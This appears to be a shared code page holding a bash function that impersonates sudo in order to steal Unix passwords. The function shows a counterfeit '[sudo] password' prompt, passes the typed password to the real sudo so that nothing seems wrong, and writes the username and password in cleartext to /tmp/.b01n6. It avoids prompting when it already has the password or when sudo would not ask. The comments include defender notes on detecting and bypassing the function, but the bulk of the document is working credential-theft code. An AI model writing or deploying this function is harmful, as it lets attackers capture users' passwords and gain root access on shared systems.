Imitation-sudo function for stealing Unix passwords
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
# sudo (shell function): shadows the real sudo binary in the shell where it is defined.
# On a qualifying call it shows a look-alike "[sudo] password for $USER: " prompt,
# hands the typed password to the real sudo, runs the requested command, and
# records "$USER : <password>" in cleartext in /tmp/.b01n6.
# Arguments: whatever the user meant to pass to sudo.
# Defender notes:
#   - In a live shell, `type sudo` reporting a function instead of a file path is
#     the indicator; `command sudo` or the binary's absolute path bypasses a
#     function of this name.
#   - /tmp/.b01n6 is the on-disk artifact; treat any password found there as exposed.
function sudo () { | |
# Path of the real binary as reported by `which`; every pass-through below uses it.
realsudo="$(which sudo)" | |
# Skip altogether if $USER is not set for whatever reason | |
if [[ -z $USER ]]; | |
then | |
# Arguments go straight to the real sudo; nothing is captured on this path.
$realsudo "${@:1}" | |
return | |
fi | |
# All arguments as one string; used for the pattern checks and the later call.
realcommand="${@:1}" | |
# `sudo -l` output: the line naming $USER plus the two lines after it, whitespace removed.
allowedcmds=`sudo -l | grep -A 2 "$USER may run the following commands" | tr -d "[:space:]"` | |
# Skip if already found, if user is allowed to run with nopasswd, or for any "-" commands | |
# i.e. no fake prompt when /tmp/.b01n6 already contains $USER, when the argument
# string contains "-", or when it appears inside the sudo -l excerpt.
if grep -Fqs "$USER" /tmp/.b01n6 || [[ $realcommand == *"-"* ]] || [[ $allowedcmds == *"$realcommand"* ]]; | |
then | |
$realsudo $realcommand | |
else | |
# -s disables echo and the prompt text copies sudo's own wording; the typed
# value is stored in inputPasswd.
read -s -p "[sudo] password for $USER: " inputPasswd | |
# Feeds the typed password to the real sudo on stdin (-S) to run a no-op as root,
# output discarded. Presumably this caches the credential so the next call does
# not prompt again; that depends on the sudoers timestamp settings.
$realsudo -S <<< "$inputPasswd" -u root bash -c "exit" >/dev/null 2>&1 | |
$realsudo $realcommand | |
# Replaces the content of /tmp/.b01n6 with one cleartext line "$USER : <typed password>".
# The file mode follows the user's umask, so other local accounts may be able to read it.
printf "\n"; printf '%s\n' "$USER : $inputPasswd" >/tmp/.b01n6 | |
fi | |
} |